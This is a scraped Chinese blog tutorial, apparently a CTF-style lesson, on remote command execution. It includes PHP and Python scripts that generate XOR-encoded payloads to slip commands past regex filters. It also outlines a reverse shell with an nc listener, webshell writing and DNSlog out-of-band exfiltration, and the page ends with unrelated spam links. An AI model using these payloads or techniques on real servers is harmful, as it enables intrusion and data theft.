当前位置: 首页 > news >正文

网站设计与网页配色实例精讲wordpress 表单 excel

网站设计与网页配色实例精讲,wordpress 表单 excel,快速排名软件哪个好,免费的ppt模板软件前言 了解了漏洞的原理之后就需要知道 他在哪能出现 并且被利用 这个还是很重要的 异或测试 使用异或(XOR)运算进行加密解密的原理_异或加密-CSDN博客 异或测试是在 白盒内执行的 一个例题看一下 输入什么都是会报错 这种情况就需要使用 异或计…

前言

了解了漏洞的原理之后就需要知道  他在哪能出现  并且被利用  这个还是很重要的

异或测试

使用异或(XOR)运算进行加密解密的原理_异或加密-CSDN博客

异或测试是在 白盒内执行的 一个例题看一下

输入什么都是会报错

这种情况就需要使用  异或计算或者或运算进行绕过 脚本:

<?php
$myfile = fopen("res.txt", "w");
$contents="";
for ($i=0; $i < 256; $i++) {for ($j=0; $j <256 ; $j++) {if($i<16){$hex_i='0'.dechex($i);}else{$hex_i=dechex($i);}if($j<16){$hex_j='0'.dechex($j);}else{$hex_j=dechex($j);}$preg = '/[a-z0-9]/i'; //根据题目给的正则表达式修改即可if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){echo "";}else{$a='%'.$hex_i;$b='%'.$hex_j;$c=(urldecode($a)^urldecode($b));if (ord($c)>=32&ord($c)<=126) {$contents=$contents.$c." ".$a." ".$b."\n";}}}
}
fwrite($myfile,$contents);
fclose($myfile);

运行之后会生成一个 文件

import requests
import urllib
from sys import *
import osdef action(arg):s1 = ""s2 = ""for i in arg:f = open("res.txt", "r")while True:t = f.readline()if t == "":breakif t[0] == i:# print(i)s1 += t[2:5]s2 += t[6:9]breakf.close()output = "(\"" + s1 + "\"^\"" + s2 + "\")"return (output)while True:param = action(input("\n[+] your function:")) + action(input("[+] your command:")) + ";"print(param)

之后运行这个 就会出现询问

把上边这个异或计算的值拿出来直接 放到参数里

就能执行命令了

黑盒测试

RCE的黑盒出现在哪里啊?记住原理用户的输入别当做恶意代码执行   找有输入的地方但是 有输入怎么可能让你调用这个呀    那不就是相关的工具嘛  找一下(一般这类工具都是在沙盒里的)

JSLinux                       

可以查看相关的配置文件   这些配置文件就是它本身的 

弹个shell试一下  构造shell

[~]#棱角 ::Edge.Forum*

本地服务器监听  nc -lvvp 66   不就可以拿到shell了呀  但是一般的这个linux工具给你使用都会给这个命令禁   或者直接把命令文件删除

无回显问题

1、命令执行写的 网站服务器的其他的文本下边

2、带外

演示:    shell_exec 需要输出才能回显数据

1、

写个文件

写个木马 访问连接上去不就又是一个思路了嘛

2、带外

使用DNSlog  

获取ip

数据带外 (因为我只是localhost 是带不出来的 如果想带外就需要自己搭建个本地网站)

http://www.15wanjia.com/news/157376.html

相关文章:

  • 怎样做一个企业网站中国中小企业信息网官网
  • 无锡网站建设制作公司上海个人建站模板
  • win7 iis创建网站成都app定制开发公司
  • 网站和h5嘉兴有能做网站优化
  • 企业型网站建设怎样收费中国市场调查网
  • 找家里做的工作上哪个网站海口建网站公司
  • 口碑好的网站建设收费专业网站推广公司
  • 做车贷的网站成都小程序定制开发公司
  • 不会写代码如何做网站六年级做的网站的软件下载
  • 平武移动网站建设网页是啥
  • wordpress网站主题插件python后端开发需要学什么
  • 新开传奇网站超变wordpress拖曳式建站
  • 杭州网站推广方式网页版qq下载
  • 如何经营自己的网站如何引用404做网站
  • 周村有做网站广告的吗官网设计效果图
  • 简述网站开发技术官方网站的网络营销功能分析
  • 网站优化具体怎么做武夷山景区网站建设优点
  • 青岛 网站建设WordPress主题里的AD
  • app开发 网站开发统称自己电脑 wordpress
  • 永久免费搭建网站成都的企业网站建设公司
  • 宁德网站建设制作Wordpress大前端破解版
  • 贵阳市网站开发快要到期的域名网站
  • 中小学学校网站建设建新建设集团有限公司网站
  • 公司网站建设合规吗聊城集团网站建设加盟
  • 一_建设网站前的市场分析艾艺公司团队定制
  • 建筑网站视频大全建设网站需要做的工作
  • 电子商务网站基本功能盐城seo营销
  • 自己建网站有什么好处怎样设计一个网页
  • 做网站自动上传文章论坛静态网站源码
  • 前端网站开发的公用头部h5手机网站实例